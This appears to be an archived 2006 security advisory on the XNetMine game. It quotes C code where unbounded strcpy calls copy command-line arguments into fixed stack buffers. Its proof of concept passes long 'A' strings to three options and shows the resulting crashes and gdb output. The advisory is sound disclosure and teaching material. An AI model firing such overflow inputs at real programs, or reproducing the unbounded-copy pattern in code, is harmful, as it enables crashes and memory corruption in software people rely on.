exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

XNetMine.txt

XNetMine.txt
Posted Oct 20, 2006
Authored by federico | Site defsol.plugs.it

XNetMine suffers from multiple buffer overflow exploits. PoC included that crashes XNetMine.

tags | exploit, overflow
SHA-256 | a2fc3791deffb5ecd911059e7f5a82944a96906478013639e2b12aabd27d7c48

XNetMine.txt

Change Mirror Download
This is a multi-part message in MIME format.
--------------070909050408080804050008
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit

//

Vendor: Martin Bauer
Software: http://ibiblio.org/pub/Linux/games/multiplayer/XNetMine.tgz

*Vulnerable code:*
--
line: 672/676

if (strncmp("-PortNumber",argv[t+1],11)==0)
{ char text[500];
strcpy(text,argv[t+1]);
strcpy(Port,&text[11]);
}
--
line: 677/682

if (strncmp("-Name",argv[t+1],5)==0)
{
char text[500];
strcpy(text,argv[t+1]);
strcpy(User,&text[5]);
}
--
line: 683/688

if (strncmp("-ServerName",argv[t+1],11)==0)
{
char text[500];
strcpy(text,argv[t+1]);
strcpy(ServerName,&text[11]);
}
--

*Proof of concept:*
--
federico XNetMine % ./XNetMine -Server -PortNumber`perl -e 'print "A"x498'`
Server:1094795585 Client:0 PortNum:AAAAAAAAAAAAAAAAAAAAAAAAAAA(...)
ServerName:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)"
Segmentation fault

federico XNetMine % ./XNetMine -Server -PortNumber31337 -Name`perl -e 'print "A"x504'`
Server:1 Client:0 PortNum:AAAAAAAAAAAAAAAAAAAAAAAA
Name:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)" ServerName:""
Segmentation fault

federico XNetMine % ./XNetMine -Server -PortNumber31337 -Name31337 -ServerName`perl -e 'print "A"x504'`
Server:1 Client:0 PortNum:31337
Name:"31337" ServerName:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)"
Segmentation fault
--

*Debug information:*
--
(gdb) p $eip
$1 = (void (*)()) 0x804a862
(gdb) stepi
Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
SIGSEGV 0x0804a862 in main ()

-- federico
federico@plugs.it / http://defsol.plugs.it/

//

--------------070909050408080804050008
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta content="text/html;charset=ISO-8859-1" http-equiv="Content-Type">
<title></title>
</head>
<body bgcolor="#ffffff" text="#000000">
<i><font><i>
<pre>Vendor: Martin Bauer
Software: <a class="moz-txt-link-freetext"
href="http://ibiblio.org/pub/Linux/games/multiplayer/XNetMine.tgz">http://ibiblio.org/pub/Linux/games/multiplayer/XNetMine.tgz</a>

<b>Vulnerable code:</b>
--
line: 672/676

if (strncmp("-PortNumber",argv[t+1],11)==0)
{ char text[500];
strcpy(text,argv[t+1]);
strcpy(Port,&text[11]);
}
--
line: 677/682

if (strncmp("-Name",argv[t+1],5)==0)
{
char text[500];
strcpy(text,argv[t+1]);
strcpy(User,&text[5]);
}
--
line: 683/688

if (strncmp("-ServerName",argv[t+1],11)==0)
{
char text[500];
strcpy(text,argv[t+1]);
strcpy(ServerName,&text[11]);
}
--

<b>Proof of concept:</b>
--
federico XNetMine % ./XNetMine -Server -PortNumber`perl -e 'print "A"x498'`
Server:1094795585 Client:0 PortNum:AAAAAAAAAAAAAAAAAAAAAAAAAAA(...)
ServerName:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)"
Segmentation fault

federico XNetMine % ./XNetMine -Server -PortNumber31337 -Name`perl -e 'print "A"x504'`
Server:1 Client:0 PortNum:AAAAAAAAAAAAAAAAAAAAAAAA
Name:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)" ServerName:""
Segmentation fault

federico XNetMine % ./XNetMine -Server -PortNumber31337 -Name31337 -ServerName`perl -e 'print "A"x504'`
Server:1 Client:0 PortNum:31337
Name:"31337" ServerName:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)"
Segmentation fault
--

<b>Debug information:</b>
--
(gdb) p $eip
$1 = (void (*)()) 0x804a862 <main+753>
(gdb) stepi
Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
SIGSEGV 0x0804a862 in main ()

-- federico
<a class="moz-txt-link-abbreviated" href="mailto:federico@plugs.it">federico@plugs.it</a> / <a
class="moz-txt-link-freetext" href="http://defsol.plugs.it/">http://defsol.plugs.it/</a>
</main+753></pre>
</i></font></i>
</body>
</html>

--------------070909050408080804050008--
Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    12 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    14 Files
  • 6
    Dec 6th
    18 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close